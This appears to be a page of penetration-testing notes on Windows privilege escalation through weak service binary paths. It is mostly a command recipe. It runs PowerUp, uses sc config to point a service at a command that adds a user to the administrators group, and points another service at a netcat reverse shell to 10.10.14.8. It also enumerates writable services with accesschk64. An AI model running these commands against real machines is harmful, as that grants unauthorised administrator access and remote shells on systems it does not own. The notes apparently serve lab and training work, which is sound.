Binary Paths

Overview

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.

Exploitation using PowerUp

Run PowerUp on machine

. .\PowerUp.ps1
Invoke-AllChecks

Change the binary path

sc config daclsvc binpath= "net localgroup administrators Greg /add"
sc config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"

Start service

sc start dacl

Exploitation via Accesschk64

Check for services with write permissions

accesschk64.exe --accept-eula -uwcv Everyone *

accesschk64.exe -uwcv daclsvc

Query the service

sc qc daclsvc

Changing the binary path is the same as the last method

PreviousService Permissions NextUnquoted Service Paths

Last updated 1 year ago

hashtagOverview

hashtagExploitation using PowerUp

hashtagRun PowerUp on machine

hashtagChange the binary path

hashtagStart service

hashtagExploitation via Accesschk64

hashtagCheck for services with write permissions

hashtagQuery the service

hashtagChanging the binary path is the same as the last method

Overview

Exploitation using PowerUp

Run PowerUp on machine

Change the binary path

Start service

Exploitation via Accesschk64

Check for services with write permissions

Query the service

Changing the binary path is the same as the last method